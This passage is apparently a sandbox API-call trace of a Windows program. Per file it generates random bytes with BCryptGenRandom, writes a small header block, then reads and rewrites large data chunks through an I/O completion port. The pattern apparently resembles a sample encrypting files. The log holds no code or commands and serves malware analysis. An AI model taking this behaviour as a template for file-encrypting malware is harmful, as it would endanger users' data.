lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.994] ReadFile (in: hFile=0x3a0, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0083.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.011] CloseHandle (hObject=0x3a0) returned 1 [0083.011] free (_Block=0x3df0128) [0083.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0083.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0083.239] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0083.239] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0083.239] free (_Block=0x77d800) [0083.239] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0083.239] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0083.239] free (_Block=0x1ff1930) [0083.239] free (_Block=0x1ff1a40) [0083.239] free (_Block=0x77d908) [0083.239] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0083.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.243] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.245] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0083.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.275] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.297] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.317] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.336] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1a3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.349] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x2ee8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.349] CloseHandle (hObject=0x3b8) returned 1 [0083.351] free (_Block=0x1fb18c0) [0083.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0083.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0083.368] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.368] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.369] free (_Block=0x1ff1e60) [0083.369] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.369] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.369] free (_Block=0x1ff1e60) [0083.369] free (_Block=0x1ff1930) [0083.369] free (_Block=0x77d800) [0083.369] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.409] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x39eb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.413] CloseHandle (hObject=0x3b8) returned 1 [0083.413] free (_Block=0x1fb18c0) [0083.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.416] CloseHandle (hObject=0x3b8) returned 1 [0083.416] free (_Block=0x1fb18c0) [0083.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0083.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0083.430] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.430] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.430] free (_Block=0x1ff1e60) [0083.430] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.430] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.431] free (_Block=0x1ff1e60) [0083.431] free (_Block=0x1ff1930) [0083.431] free (_Block=0x77d800) [0083.431] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.436] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x3dd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.440] CloseHandle (hObject=0x3b8) returned 1 [0083.440] free (_Block=0x1fb18c0) [0083.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0083.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0083.461] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.461] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.461] free (_Block=0x1ff1e60) [0083.461] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.461] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.461] free (_Block=0x1ff1e60) [0083.461] free (_Block=0x1ff1930) [0083.461] free (_Block=0x77d800) [0083.461] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.467] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.471] CloseHandle (hObject=0x3b8) returned 1 [0083.471] free (_Block=0x1fb18c0) [0083.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0083.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0083.485] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.485] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.485] free (_Block=0x1ff1e60) [0083.485] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.485] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.485] free (_Block=0x1ff1e60) [0083.485] free (_Block=0x1ff1930) [0083.485] free (_Block=0x77d800) [0083.486] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.492] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.497] CloseHandle (hObject=0x3b8) returned 1 [0083.497] free (_Block=0x1fb18c0) [0083.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0083.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0083.510] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.510] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.510] free (_Block=0x1ff1e60) [0083.510] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.510] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.510] free (_Block=0x1ff1e60) [0083.511] free (_Block=0x1ff1930) [0083.511] free (_Block=0x77d800) [0083.511] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0083.511] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.132] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x739, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.133] CloseHandle (hObject=0x3b8) returned 1 [0084.134] free (_Block=0x1fb18c0) [0084.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0084.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0084.157] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.157] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.157] free (_Block=0x1ff1e60) [0084.157] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.157] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.158] free (_Block=0x1ff1e60) [0084.158] free (_Block=0x1ff1930) [0084.158] free (_Block=0x77d800) [0084.158] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0084.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0084.166] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.166] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.166] free (_Block=0x1ff1e60) [0084.166] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.166] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.167] free (_Block=0x1ff1e60) [0084.167] free (_Block=0x1ff1930) [0084.167] free (_Block=0x77d800) [0084.167] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0084.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.189] CloseHandle (hObject=0x3b8) returned 1 [0084.189] free (_Block=0x1fb18c0) [0084.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.210] CloseHandle (hObject=0x3bc) returned 1 [0084.210] free (_Block=0x3df0008) [0084.210] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.243] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xb50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0084.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.262] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0084.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0084.268] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: 